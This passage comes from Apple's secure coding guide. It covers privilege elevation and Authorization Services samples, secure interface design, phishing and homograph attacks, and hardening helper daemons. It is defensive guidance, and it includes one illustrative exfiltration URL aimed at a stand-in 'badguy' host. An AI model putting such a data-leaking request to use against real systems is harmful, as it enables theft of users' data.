of the setuid bit and related routines, see “Elevating Privileges Safely” (page 59). ● SystemStarter When you put an executable in the /Library/StartupItems directory, it is started by the SystemStarter program at boot time. Because SystemStarter runs with root privileges, you can start your program with any level of privilege you wish. Be sure to use the lowest privilege level that you can use to accomplish your task, and to drop privilege as soon as possible. Startup items run daemons with root privilege in a single global session; these processes serve all users. For OS X v10.4 and later, the use of startup items is deprecated; use the launchd daemon instead. For more information on startup items and startup item privileges,see “Startup Items” in Daemons and Services Programming Guide . ● AuthorizationExecWithPrivilege The Authorization Services API provides the AuthorizationExecWithPrivilege function, which launches a privileged helper as the root user. Although this function can execute any process temporarily with root privileges, it is not recommended except for installersthat have to be able to run from CDs and self-repairing setuid tools. See Authorization Services Programming Guide for more information. ● xinetd In earlier versions of OS X, the xinetd daemon was launched with root privileges at system startup and subsequently launched internetservices daemons when they were needed. The xinetd.conf configuration file specified the UID and GID of each daemon started and the port to be used by each service. Starting with OS X v10.4, you should use launchd to perform the services formerly provided by xinetd. SeeDaemonsandServicesProgrammingGuide forinformation about convertingfromxinetdtolaunchd. See the manual pages for xinetd(8) and xinetd.conf(5) for more information about xinetd. ● Other If you are using some other method to obtain elevated privilege for your process, you should switch to one of the methods described here and follow the cautions described in this chapter and in “Elevating Privileges Safely” (page 59). Elevating Privileges Safely Limitations and Risks of Other Mechanisms 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 68Factoring Applications If you’ve read this far and you’re still convinced you need to factor your application into privileged and nonprivileged processes, this section provides some tips and sample code. In addition, see Authorization Services Programming Guide for more advice on the use of Authorization Services and the proper way to factor an application. As explained in the Authorization Services documentation, it is very important that you check the user’s rights to perform the privileged operation, both before and after launching your privileged helper tool. Your helper tool, owned by root and with the setuid bit set, has sufficient privileges to perform whatever task it has to do. However, if the user doesn’t have the rights to perform this task, you shouldn’t launch the tool and—if the tool gets launched anyway—the tool should quit without performing the task. Your nonprivileged process should first use Authorization Services to determine whether the user is authorized and to authenticate the user if necessary (this is called preauthorizing ; see Listing 5-1 (page 70)). Then launch your privileged process. The privileged process then should authorize the user again, before performing the task that requires elevated privileges; see Listing 5-2 (page 71). As soon as the task is complete, the privileged process should terminate. In determining whether a user has sufficient privileges to perform a task, you should use rights that you have defined and put into the policy database yourself. If you use a right provided by the system or by some other developer, the user might be granted authorization for that right by some other process, thus gaining privileges to your application or access to data that you did not authorize or intend. For more information about policies and the policy database, (see the section “The Policy Database” in the “Authorization Concepts” chapter of Authorization Services Programming Guide ). In the code samples shown here, the task that requires privilege is killing a process that the user does not own. Example: Preauthorizing If a user tries to kill a process that he doesn’t own, the application has to make sure the user is authorized to do so. The following numbered items correspond to comments in the code sample: 1. If the process is owned by the user, and the process is not the window server or the login window, go ahead and kill it. 2. Call the permitWithRight method to determine whether the user has the right to kill the process. The application must have previously added this right—in this example, called com.apple.processkiller.kill—to the policy database. The permitWithRight method handles the interaction with the user (such as an authentication dialog). If this method returns 0, it completed without an error and the user is considered preauthorized. 3. Obtain the authorization reference. 4. Create an external form of the authorization reference. 5. Create a data object containing the external authorization reference. Elevating Privileges Safely Factoring Applications 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 696. Pass this serialized authorization reference to the setuid tool that will kill the process (Listing 5-2 (page 71)). Listing 5-1 Non-privileged process if (ownerUID == _my_uid && ![[contextInfo processName] isEqualToString:@"WindowServer"] && ![[contextInfo processName] isEqualToString:@"loginwindow"]) { [self killPid:pid withSignal:signal]; // 1 } else { SFAuthorization *auth = [SFAuthorization authorization]; if (![auth permitWithRight:"com.apple.proccesskiller.kill" flags: kAuthorizationFlagDefaults|kAuthorizationFlagInteractionAllowed| kAuthorizationFlagExtendRights|kAuthorizationFlagPreAuthorize]) // 2 { AuthorizationRef authRef = [auth authorizationRef]; // 3 AuthorizationExternalForm authExtForm; OSStatus status = AuthorizationMakeExternalForm(authRef, &authExtForm);// 4 if (errAuthorizationSuccess == status) { NSData *authData = [NSData dataWithBytes: authExtForm.bytes length: kAuthorizationExternalFormLength]; // 5 [_agent killProcess:pid signal:signal authData: authData]; // 6 } } } The external tool is owned by root and has its setuid bit set so that it runs with root privileges. It imports the externalized authorization rights and checks the user’s authorization rights again. If the user has the rights, the tool killsthe process and quits. The following numbered items correspond to commentsin the code sample: 1. Convert the external authorization reference to an authorization reference. 2. Create an authorization item array. 3. Create an authorization rights set. Elevating Privileges Safely Factoring Applications 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 704. Call the AuthorizationCopyRights function to determine whether the user has the right to kill the process. You pass this function the authorization reference. If the credentials issued by the Security Server when it authenticated the user have not yet expired, this function can determine whether the user is authorized to kill the process without reauthentication. If the credentials have expired, the Security Server handles the authentication (for example, by displaying a password dialog). (You specify the expiration period for the credentials when you add the authorization right to the policy database.) 5. If the user is authorized to do so, kill the process. 6. If the user is not authorized to kill the process, log the unsuccessful attempt. 7. Release the authorization reference. Listing 5-2 Privileged process AuthorizationRef authRef = NULL; OSStatus status = AuthorizationCreateFromExternalForm( (AuthorizationExternalForm *)[authData bytes], &authRef); // 1 if ((errAuthorizationSuccess == status) && (NULL != authRef)) { AuthorizationItem right = {"com.apple.proccesskiller.kill", 0L, NULL, 0L}; // 2 AuthorizationItemSet rights = {1, &right}; // 3 status = AuthorizationCopyRights(authRef, &rights, NULL, kAuthorizationFlagDefaults | kAuthorizationFlagInteractionAllowed | kAuthorizationFlagExtendRights, NULL); // 4 if (errAuthorizationSuccess == status) kill(pid, signal); // 5 else NSLog(@"Unauthorized attempt to signal process %d with %d", pid, signal); // 6 AuthorizationFree(authRef, kAuthorizationFlagDefaults); // 7 } Helper Tool Cautions If you write a privileged helper tool, you need to be very careful to examine your assumptions. For example, you should always check the results of function calls; it is dangerousto assume they succeeded and to proceed on that assumption. You must be careful to avoid any of the pitfalls discussed in this document, such as buffer overflows and race conditions. Elevating Privileges Safely Factoring Applications 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 71If possible, avoid linking in any extra libraries. If you do have to link in a library, you must not only be sure that the library has no security vulnerabilities, but also that it doesn’t link in any other libraries. Any dependencies on other code potentially open your code to attack. In order to make your helper tool as secure as possible, you should make it as short as possible—have it do only the very minimum necessary and then quit. Keeping it short makes it less likely that you made mistakes, and makes it easier for others to audit your code. Be sure to get a security review from someone who did not help write the tool originally. An independent reviewer is less likely to share your assumptions and more likely to spot vulnerabilities that you missed. Authorization and Trust Policies In addition to the basic permissions provided by BSD, the OS X Authorization Services API enables you to use the policy database to determine whether an entity should have access to specific features or data within your application. Authorization Services includes functions to read, add, edit, and delete policy database items. You should define your own trust policies and put them in the policy database. If you use a policy provided by the system or by some other developer, the user might be granted authorization for a right by some other process, thus gaining privileges to your application or access to data that you did not authorize or intend. Define a different policy for each operation to avoid having to give broad permissions to users who need only narrow privileges. For more information about policies and the policy database, see the section “The Policy Database” in the “Authorization Concepts” chapter of Authorization Services Programming Guide . Authorization Services does not enforce access controls; rather, it authenticates users and lets you know whether they have permission to carry out the action they wish to perform. It is up to your program to either deny the action or carry it out. Security in a KEXT Because kernel extensions have no user interface, you cannot call Authorization Servicesto obtain permissions that you do not already have. However, in portions of your code that handle requests from user space, you can determine what permissions the calling process has, and you can evaluate access control lists (ACLs; see the section “ACLs” in the “Security Concepts” section of Security Overview). In OS X v10.4 and later, you can also use the Kernel Authorization (Kauth) subsystem to manage authorization. For more information on Kauth, see Technical Note TN2127, Kernel Authorization (http://developer.apple.com/technotes/tn2005/tn2127.html). Elevating Privileges Safely Authorization and Trust Policies 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 72The user is often the weak link in the security of a system. Many security breaches have been caused by weak passwords, unencrypted filesleft on unprotected computers, and successfulsocial engineering attacks. Therefore, it is vitally important that your program’s user interface enhance security by making it easy for the user to make secure choices and avoid costly mistakes. In a social engineering attack, the user is tricked into either divulging secret information or running malicious code. For example, the Melissa virus and the Love Letter worm each infected thousands of computers when users downloaded and opened files sent in email. This chapter discusses how doing things that are contrary to user expectations can cause a security risk, and gives hints for creating a user interface that minimizes the risk from social engineering attacks. Secure human interface design is a complex topic affecting operating systems as well as individual programs. This chapter gives only a few hints and highlights. For an extensive discussion of this topic, see Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use , O’Reilly, 2005. There is also an interesting weblog on this subject maintained by researchers at the University of California at Berkeley (http://usablesecurity.com/). Use Secure Defaults Most users use an application’s default settings and assume that they are secure. If they have to make specific choices and take multiple actions in order to make a program secure, few will do so. Therefore, the default settings for your program should be as secure as possible. For example: ● If your program launches other programs, it should launch them with the minimum privileges they need to run. ● If your program supports optionally connecting by SSL, the checkbox should be checked by default. ● If your program displays a user interface that requires the user to decide whether to perform a potentially dangerous action, the default option should be the safe choice. If there is no safe choice, there should be no default. (See “UI Element Guidelines: Controls” in OS X Human Interface Guidelines.) And so on. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 73 Designing Secure User InterfacesThere is a common belief that security and convenience are incompatible. With careful design, this does not have to be so. In fact, it is very important that the user not have to sacrifice convenience for security, because many users will choose convenience in thatsituation. In many cases, a simpler interface is more secure, because the user is less likely to ignore security features and less likely to make mistakes. Whenever possible, you should make security decisions for your users: in most cases, you know more about security than they do, and if you can’t evaluate the evidence to determine which choice is most secure, the chances are your users will not be able to do so either. For a detailed discussion of this issue and a case study, see the article “Firefox and the Worry-Free Web” in Cranor and Garfinkel, Security and Usability: Designing Secure Systems that People Can Use . Meet Users’ Expectations for Security If your program handles data that the user expects to be kept secret, make sure that you protect that data at all times. That means not only keeping it in a secure location or encrypting it on the user’s computer, but not handing it off to another program unless you can verify that the other program will protect the data, and not transmitting it over an insecure network. If for some reason you cannot keep the data secure, you should make this situation obvious to users and give them the option of canceling the insecure operation. Important: The absence of an indication that an operation is secure is not a good way to inform the user that the operation is insecure. A common example of this is any web browser that adds a lock icon (usually small and inconspicuous) on web pages that are protected by SSL/TLS or some similar protocol. The user has to notice that this icon is not present (or that it’s in the wrong place, in the case of a spoofed web page) in order to take action. Instead, the program should prominently display some indication for each web page or operation that is not secure. The user must be made aware of when they are granting authorization to some entity to act on their behalf or to gain access to their files or data. For example, a program might allow users to share files with other users on remote systems in order to allow collaboration. In this case, sharing should be off by default. If the user turns it on, the interface should make clear the extent to which remote users can read from and write to files on the local system. If turning on sharing for one file also lets remote users read any other file in the same folder, for example, the interface must make this clear before sharing is turned on. In addition, as long as sharing is on, there should be some clear indication that it is on, lest users forget that their files are accessible by others. Designing Secure User Interfaces Meet Users’ Expectations for Security 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 74Authorization should be revocable: if a user grants authorization to someone, the user generally expects to be able to revoke that authorization later. Whenever possible, your program should not only make this possible, it should make it easy to do. If for some reason it will not be possible to revoke the authorization, you should make that clear before granting the authorization. You should also make it clear that revoking authorization cannot reverse damage already done (unless your program provides a restore capability). Similarly, any other operation that affects security but that cannot be undone should either not be allowed or the user should be made aware of the situation before they act. For example, if all files are backed up in a central database and can’t be deleted by the user, the user should be aware of that fact before they record information that they might want to delete later. As the user’s agent, you must carefully avoid performing operations that the user does not expect or intend. For example, avoid automatically running code if it performsfunctionsthat the user has not explicitly authorized. Secure All Interfaces Some programs have multiple user interfaces, such as a graphical user interface, a command-line interface, and an interface for remote access. If any of these interfaces require authentication (such as with a password), then all the interfaces should require it. Furthermore, if you require authentication through a command line or remote interface, be sure the authentication mechanism is secure—don’t transmit passwords in cleartext, for example. Place Files in Secure Locations Unless you are encrypting all output, the location where you save files has important security implications. For example: ● FileVault can secure the root volume (or the user’s home folder prior to OS X v10.7), but not other locations where the user might choose to place files. ● Folder permissions can be set in such a way that others can manipulate their contents. You should restrict the locations where users can save files if they contain information that must be protected. If you allow the user to select the location to save files, you should make the security implications of a particular choice clear; specifically, they must understand that, depending on the location of a file, it might be accessible to other applications or even remote users. Designing Secure User Interfaces Secure All Interfaces 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 75Make Security Choices Clear Most programs, upon detecting a problem or discrepancy, display a dialog box informing the user of the problem. Often this approach does not work, however. For one thing, the user might not understand the warning or its implications. For example, if the dialog warns the user that the site to which they are connecting has a certificate whose name does not match the name of the site, the user is unlikely to know what to do with that information, and is likely to ignore it. Furthermore, if the program puts up more than a few dialog boxes, the user is likely to ignore all of them. To solve this problem, when giving the user a choice that has security implications, make the potential consequences of each choice clear. The user should never be surprised by the results of an action. The choice given to the user should be expressed in terms of consequences and trade-offs, not technical details. For example, a choice of encryption methods should be based on the level of security (expressed in simple terms,such asthe amount of time it might take to break the encryption) versusthe time and disk space required to encrypt the data, rather than on the type of algorithm and the length of the key to be used. If there are no practical differences of importance to the user (as when the more secure encryption method is just as efficient as the less-secure method), just use the most secure method and don’t give the user the choice at all. Be sensitive to the fact that few users are security experts. Give as much information—in clear, nontechnical terms—as necessary for them to make an informed decision. In some cases, it might be best not to give them the option of changing the default behavior. For example, most users don’t know what a digital certificate is, let alone the implications of accepting a certificate signed by an unknown authority. Therefore, it is probably not a good idea to let the user permanently add an anchor certificate (a certificate that is trusted for signing other certificates) unless you can be confident that the user can evaluate the validity of the certificate. (Further, if the user is a security expert, they’ll know how to add an anchor certificate to the keychain without the help of your application anyway.) If you are providing security features, you should make their presence clear to the user. For example, if your mail application requires the user to double click a small icon in order to see the certificate used to sign a message, most users will never realize that the feature is available. In an often-quoted but rarely applied monograph, Jerome Saltzer and Michael Schroeder wrote “It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly. Also, to the extent that the user’s mental image of his protection goals matchesthe mechanisms he must use, mistakes will be minimized. If he must translate hisimage of his protection needs into a radically different specification language, he will make errors.” (Saltzer and Schroeder, “The Protection of Information in Computer Systems,” Proceedings of the IEEE 63:9, 1975.) Designing Secure User Interfaces Make Security Choices Clear 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 76For example, you can assume the user understandsthat the data must be protected from unauthorized access; however, you cannot assume the user has any knowledge of encryption schemes or knows how to evaluate password strength. In this case, your program should present the user with choices like the following: ● “Is your computer physically secure, or is it possible that an unauthorized user will have physical access to the computer?” ● “Is your computer connected to a network?” From the user’s answers, you can determine how best to protect the data. Unless you are providing an “expert” mode, do not ask the user questions like the following: ● “Do you want to encrypt your data, and if so, with which encryption scheme?” ● “How long a key should be used?” ● “Do you want to permit SSH access to your computer?” These questions don’t correspond with the user’s view of the problem. Therefore, the user’s answers to such questions are likely to be erroneous. In this regard, it is very important to understand the user’s perspective. Very rarely is an interface thatseemssimple or intuitive to a programmer actually simple or intuitive to average users. To quote Ka-Ping Yee (User Interaction Design for Secure Systems, at http://www.eecs.berkeley.edu/Pubs/TechRpts/2002/CSD-02-1184.pdf): In order to have a chance of using a system safely in a world of unreliable and sometimes adversarial software, a user needs to have confidence in all of the following statements: ● Things don’t become unsafe all by themselves. (Explicit Authorization) ● I can know whether things are safe. (Visibility) ● I can make things safer. (Revocability) ● I don’t choose to make things unsafe. (Path of Least Resistance) ● I know what I can do within the system. (Expected Ability) ● I can distinguish the things that matter to me. (Appropriate Boundaries) ● I can tell the system what I want. (Expressiveness) ● I know what I’m telling the system to do. (Clarity) ● The system protects me from being fooled. (Identifiability, Trusted Path) For additional tips, read “Dialogs” in OS X Human Interface Guidelines and “Alerts, Action Sheets, and Modal Views” in iOS Human Interface Guidelines. Designing Secure User Interfaces Make Security Choices Clear 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 77Fight Social Engineering Attacks Social engineering attacks are particularly difficult to fight. In a social engineering attack, the attacker fools the user into executing attack code or giving up private information. A common form of social engineering attack is referred to as phishing . Phishing refers to the creation of an official-looking email or web page that fools the user into thinking they are dealing with an entity with which they are familiar,such as a bank with which they have an account. Typically, the user receives an email informing them that there is something wrong with their account, and instructing them to click on a link in the email. The link takes them to a web page that spoofs a real one; that is, it includes icons, wording, and graphical elements that echo those the user is used to seeing on a legitimate web page. The user is instructed to enter such information as their social security number and password. Having done so, the user has given up enough information to allow the attacker to access the user’s account. Fighting phishing and other social engineering attacks is difficult because the computer’s perception of an email or web page is fundamentally different from that of the user. For example, consider an email containing a link to http://scamsite.example.com/ but in which the link’s text says Apple Web Store. From the computer’s perspective, the URL links to a scam site, but from the user’s perspective, it links to Apple’s online store. The user cannot easily tell that the link does not lead to the location they expect until they see the URL in their browser; the computer similarly cannot determine that the link’s text is misleading. To further complicate matters, even when the user looks at the actual URL, the computer and user may perceive the URL differently. The Unicode characterset includes many charactersthat look similar or identical to common English letters. For example, the Russian glyph that is pronounced like “r” looks exactly like an English “p” in many fonts, though it has a different Unicode value. These characters are referred to as homographs. When web browsers began to support internationalized domain names (IDN), some phishers set up websites that looked identical to legitimate ones, using homographs in their web addresses to fool users into thinking the URL was correct. Some creative techniques have been tried for fighting social engineering attacks, including trying to recognize URLsthat are similar to, but not the same as, well-known URLs, using private email channelsfor communications with customers, using emailsigning, and allowing usersto see messages only if they come from known, trusted sources. All of these techniques have problems, and the sophistication ofsocial engineering attacksisincreasing all the time. For example, to foil the domain name homograph attack, many browsers display internationalized domain names IDN) in an ASCII format called “Punycode.” For example, an impostor website with the URL http://www.apple.com/ that uses a Roman script for all the characters except for the letter “a”, for which it uses a Cyrillic character, is displayed as http://www.xn--pple-43d.com. Designing Secure User Interfaces Fight Social Engineering Attacks 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 78Different browsers use different schemes when deciding which internationalized domain names to show and which ones to translate. For example, Safari uses this form when a URL contains characters in two or more scripts that are not allowed in the same URL, such as Cyrillic characters and traditional ASCII characters. Other browsers consider whether the characterset is appropriate for the user’s default language. Still others maintain a whitelist of registries that actively prevent such spoofing and use punycode for domains from all other registries. For a more in-depth analysis of the problem, more suggested approaches to fighting it, and some case studies, see Security and Usability: Designing Secure Systems that People Can Use by Cranor and Garfinkel. To learn more aboutsocial engineering techniquesin general, read The Art of Deception: Controlling the Human Element of Security by Mitnick, Simon, and Wozniak. Use Security APIs When Possible One way to avoid adding security vulnerabilities to your code is to use the available security APIs whenever possible. The Security Interface Framework API provides a number of user interface viewsto support commonly performed security tasks. iOS Note: The Security Interface Framework is not available in iOS. In iOS, applications are restricted in their use of the keychain, and it is not necessary for the user to create a new keychain or change keychain settings. The Security Interface Framework API provides the following views: ● TheSFAuthorizationView class implements an authorization view in a window. An authorization view is a lock icon and accompanying text that indicates whether an operation can be performed. When the user clicks a closed lock icon, an authorization dialog displays. Once the user is authorized, the lock icon appears open. When the user clicksthe open lock, Authorization Servicesrestricts access again and changes the icon to the closed state. ● The SFCertificateView and SFCertificatePanel classes display the contents of a certificate. ● The SFCertificateTrustPanel class displays and optionally lets the user edit the trust settings in a certificate. ● The SFChooseIdentityPanel class displays a list of identities in the system and lets the user select one. (In this context, identity refers to the combination of a private key and its associated certificate.) ● The SFKeychainSavePanel class adds an interface to an application that lets the user save a new keychain. The user interface is nearly identical to that used for saving a file. The difference is that this class returns a keychain in addition to a filename and lets the user specify a password for the keychain. Designing Secure User Interfaces Use Security APIs When Possible 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 79● The SFKeychainSettingsPanel class displays an interface that lets the user change keychain settings. Documentation for the Security Interface framework is in Security Interface Framework Reference . Designing Secure User Interfaces Use Security APIs When Possible 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 80Privilege separation is a common technique for making applications more secure. By breaking up an application into functional units that each require fewer privileges, you can make it harder to do anything useful with any single part of that application if someone successfully compromises it. However, without proper design, a privilege-separated app is not significantly more secure than a non-privilege-separated app. For proper security, each part of the app must treat other parts of the app as untrusted and potentially hostile. To that end, this chapter provides dos and don’ts for designing a helper app. There are two different ways that you can perform privilege separation: ● Creating a pure computation helper to isolate risky operations. Thistechnique requiresthe main application to be inherently suspicious of any data that the helper returns, but does not require that the helper be suspicious of the application. ● Creating a helper or daemon to perform tasks without granting the application the right to perform them. This requires not only that the main application not trust the helper, but also that the helper not trust the main application. The techniques used for securing the two types of helpers differ only in the level of paranoia required by the helper. Avoid Puppeteering When a helper application is so tightly controlled by the main application that it does not make any decisions by itself, thisis called puppeteering. Thisisinherently bad design because if the application gets compromised, the attacker can then control the helper similarly, in effect taking over pulling the helper’s “strings”. This completely destroys the privilege separation boundary. Therefore, unless you are creating a pure computation helper, splitting code into a helper application that simply does whatever the main app tells it to do is usually not a useful division of labor. In general, a helper must be responsible for deciding whether or not to perform a particular action. If you look at the actions that an application can perform with and without privilege separation, those lists should be different; if they are not, then you are not gaining anything by separating the functionality out into a separate helper. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 81 Designing Secure Helpers and DaemonsFor example, consider a helper that downloads help content for a word processor. If the helper fetches any arbitrary URL that the word processor sends it, the helper can be trivially exploited to send arbitrary data to an arbitrary server. For example, an attacker who took control of the browser could tell the helper to access the URL http://badguy.example.com/saveData?hereIsAnEncodedCopyOfTheUser%27sData. The subsections that follow describe solutions for this problem. Use Whitelists One way to fix this is with whitelists. The helper should include a specific list of resources that it can access. For example, this helper could include: ● A host whitelist that includes only the domain example.org. Requests to URLs in that domain would succeed, but the attacker could not cause the helper to access URLs in a different domain. ● An allowed path prefix whitelist. The attacker would not be able to use cross-site scripting on the example.org bulletin board to redirect the request to another location. (This applies mainly to apps using a web UI.) You can also avoid this by handling redirection manually. ● An allowed file type whitelist. This could limit the helper to the expected types of files. (Note that file type whitelists are more interesting for helpers that access files on the local hard drive.) ● A whitelist of specific URIs to which GET or POST operations are allowed. Use Abstract Identifiers and Structures A second way to avoid puppeteering is by abstracting away the details of the request itself, using data structures and abstract identifiers instead of providing URIs, queries, and paths. A trivial example of thisis a help system. Instead of the app passing a fully-formed URI for a help search request, it might pass a flag field whose value tells the helper to “search by name” or “search by title” and a string value containing the search string. This flag field is an example of an abstract identifier; it tells the helper what to do without telling it how to do it. Taken one step further, when the helper returns a list of search results, instead of returning the names and URIs for the result pages, it could return the names and an opaque identifier (which may be an index into the last set of search results). By doing so, the application cannot access arbitrary URIs because it never interacts with the actual URIs directly. Similarly, if you have an application that works with project files that reference other files, in the absence of API to directly support this, you can use a temporary exception to give a helper access to all files on the disk. To make this more secure, the helpershould provide access only to filesthat actually appear in the user-opened Designing Secure Helpers and Daemons Avoid Puppeteering 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 82project. The helper might do this by requiring the application to request files by some arbitrary identifier generated by the helper rather than by name or path. This makes it harder for the application to ask the helper to open arbitrary files. This can further be augmented with sniffing, as described in “Use the Smell Test” (page 83). The same concept can be extended to other areas. For example, if the application needs to change a record in a database, the helper could send the record as a data structure, and the app could send back the altered data structure along with an indication of which values need to change. The helper could then verify the correctness of the unaltered data before modifying the remaining data. Passing the data abstractly also allows the helper to limit the application’s access to other database tables. It also allows the helper to limit what kinds of queries the application can perform in ways that are more fine-grained than would be possible with the permissions system that most databases provide. Use the Smell Test If a helper application has access to files that the main application cannot access directly, and if the main application asks the helper to retrieve the contents of that file, it is useful for the helper to perform tests on the file before sending the data to ensure that the main application has not substituted a symbolic link to a different file. In particular, it is useful to compare the file extension with the actual contents of the file to see whether the bytes on disk make sense for the apparent file type. This technique is called file type sniffing. For example, the first few bytes of any image file usually provide enough information to determine the file type. If the first four bytes are JFIF, the file is probably a JPEG image file. If the first four bytes are GIF8, the file is probably a GIF image file. If the first four bytes are MM.* or II*., the file is probably a TIFF file. And so on. If the request passes this smell test, then the odds are good that the request is not malicious. Treat Both App and Helper as Hostile Because the entire purpose of privilege separation is to prevent an attacker from being able to do anything useful after compromising one part of an application, both the helper and the app must assume that the other party is potentially hostile. This means each piece must: ● Avoid buffer overflows (“Avoiding Buffer Overflows And Underflows” (page 17)). ● Validate all input from the other side (“Validating Input And Interprocess Communication” (page 33)). ● Avoid insecure interprocess communication mechanisms (“Validating Input And Interprocess Communication” (page 33)) ● Avoid race conditions (“Avoiding Race Conditions” (page 43)). Designing Secure Helpers and Daemons Treat Both App and Helper as Hostile 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 83● Treat the contents of any directory or file to which the other process has write access as fundamentally untrusted (“Securing File Operations” (page 47)). This list potentially includes: ● The entire app container directory. ● Preference files. ● Temporary files. ● User files. And so on. If you follow these design principles, you will make it harder for an attacker to do anything useful if he or she compromises your app. Run Daemons as Unique Users For daemonsthatstart with elevated privileges and then drop privileges, you should always use a locally unique user ID for your program. If you use some standard UID such as _unknown or nobody, then any other process running with thatsame UID can interact with your program, either directly through interprocess communication, or indirectly by altering configuration files. Thus, if someone hijacks another daemon on the same server, they can then interfere with your daemon; or, conversely, ifsomeone hijacks your daemon, they can use it to interfere with other daemons on the server. You can use Open Directory services to obtain a locally unique UID. Note that UIDs from 0 through 500 are reserved for use by the system. Note: You should generally avoid making security decisions based on the user’s ID or name for two reasons: ● Many APIs for determining the user ID and user name are inherently untrustworthy because they return the value of the USER. ● Someone could trivially make a copy of your app and change the string to a different value, then run the app. Start Other Processes Safely When it comes to security, not all APIs for running external tools are created equal. In particular: Avoid the POSIX system(3) function. Its simplicity makes it a tempting choice, but also makes it much more dangerous than other functions. When you use system, you become responsible for completely sanitizing the entire command, which means protecting any characters that are treated as special by the shell. You are Designing Secure Helpers and Daemons Run Daemons as Unique Users 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 84responsible for understanding and correctly using the shell’s quoting rules, knowing which characters are interpreted within each type of quotation marks, and so on. This is no small feat even for expert shell script programmers, and is strongly inadvisable for everyone else. Bluntly put, you will get it wrong. Set up your own environment correctly ahead of time. Many APIs search for the tool you want to run in locations specified by the PATH environment variable. If an attacker can modify that variable, the attacker can potentially trick your app into starting a different tool and running it as the current user. You can avoid this problem by either explicitly setting the PATH environment variable yourself or by avoiding variants of exec(3) or posix_spawn(2) that use the PATH environment variable to search for executables. Use absolute paths where possible, or relative paths if absolute paths are not available. By explicitly specifying a path to an executable rather than just its name, the PATH environment variable is not consulted when the OS determines which tool to run. For more information about environment variables and shell special characters, read Shell Scripting Primer. Designing Secure Helpers and Daemons Start Other Processes Safely 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 85This appendix presents a set of security audit checklists that you can use to help reduce the security vulnerabilities of your software. These checklists are designed to be used during software development. If you read this section all the way through before you start coding, you may avoid many security pitfalls that are difficult to correct in a completed program. Note that these checklists are not exhaustive; you might not have any of the potential vulnerabilities discussed here and still have insecure code. Also, as the author of the code, you are probably too close to the code to be fully objective, and thus may overlook certain flaws. For this reason, it’s very important that you have your code reviewed for security problems by an independent reviewer. A security expert would be best, but any competent programmer, if aware of what to look for, might find problems that you may have missed. In addition, whenever the code is updated or changed in any way, including to fix bugs, it should be checked again for security problems. Important: All code should have a security audit before being released. Use of Privilege This checklist is intended to determine whether your code ever runs with elevated privileges, and if it does, how best to do so safely. Note that it’s best to avoid running with elevated privileges if possible; see “Avoiding Elevated Privileges” (page 63). 1. Reduce privileges whenever possible. If you are using privilege separation with sandboxing or other privilege-limiting techniques, you should be careful to ensure that your helper tools are designed to limit the damage that they can cause if the main application gets compromised, and vice-versa. Read “Designing Secure Helpers And Daemons” (page 81) to learn how. Also, for daemons that start with elevated privileges and then drop privileges, you should always use a locally unique user ID for your program. See “Run Daemons As Unique Users” (page 84) to learn more. 2. Use elevated privileges sparingly, and only in privileged helpers. In most cases, a program can get by without elevated privileges, butsometimes a program needs elevated privileges to perform a limited number of operations, such as writing files to a privileged directory or opening a privileged port. 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 86 Security Development ChecklistsIf an attacker finds a vulnerability that allows execution of arbitrary code, the attacker’s code runs with the same privilege as the running code, and can take complete control of the computer if that code has root privileges. Because of this risk, you should avoid elevating privileges if at all possible. If you must run code with elevated privileges, here are some rules: ● Never run your main process as a different user. Instead, create a separate helper tool that runs with elevated privileges. ● Your helper tool should do as little as possible. ● Your helper tool should restrict what you can ask it to do as much as possible. ● Your helper tool should either drop the elevated privileges or stop executing as soon as possible. Important: If all or most of your code runs with root or other elevated privileges, or if you have complex code that performs multiple operations with elevated privileges, then your program could have a serious security vulnerability. You should seek help in performing a security audit of your code to reduce your risk. See “Elevating Privileges Safely” (page 59) and “Designing Secure Helpers And Daemons” (page 81) for more information. 3. Use launchd when possible. If you are writing a daemon or other process that runs with elevated privileges, you should always use launchd to start it. (To learn why other mechanisms are not recommended, read “Limitations And Risks Of Other Mechanisms” (page 67).) For more information on launchd,see the manual pagesfor launchd, launchctl, and launchd.plist, and Daemons and Services Programming Guide . For more information about startup items, see Daemons and Services Programming Guide . For more information on ipfw, see the ipfw manual page. 4. Avoid using sudo programmatically. If authorized to do so in the sudoers file, a user can use sudo to execute a command as root. The sudo command is intended for occasional administrative use by a user sitting at the computer and typing into the Terminal application. Its use in scripts or called from code is not secure. After executing the sudo command—which requires authenticating by entering a password—there is a five-minute period (by default) during which the sudo command can be executed without further authentication. It’s possible for another process to take advantage of this situation to execute a command as root. Further, there is no encryption or protection of the command being executed. Because sudo is used to execute privileged commands, the command arguments often include user names, passwords, and other information that should be kept secret. A command executed in this way by a script or other code can expose confidential data to possible interception and compromise. Security Development Checklists Use of Privilege 2012-06-11 | © 2012 Apple Inc. All Rights Reserved. 875. Minimize the amount of code that must be run with elevated privileges. Ask yourself approximately how many lines of code need to run with elevated privileges. If this answer is either “all” or is a difficult number to compute, then it will be very difficult to perform a security review of your software. If you can’t determine how to factor your application to separate out the code that needs privileges, you are strongly encouraged to seek assistance with your project immediately. If you are an ADC member, you are encouraged to ask for help from Apple engineers with factoring your code and performing a security audit. If you are not an ADC member, see the ADC membership page at http://developer.apple.com/programs/. 6. Never run a GUI application with elevated privileges. You should never run a GUI application with elevated privileges. Any GUI application linksin many libraries over which you have no control and which, due to their size and complexity, are very likely to contain security vulnerabilities. In this case, your application runs in an environment set by the GUI, not by your code. Your code and your user’s data can then be compromised by the exploitation of any vulnerabilities in the libraries or environment of the graphical interface. 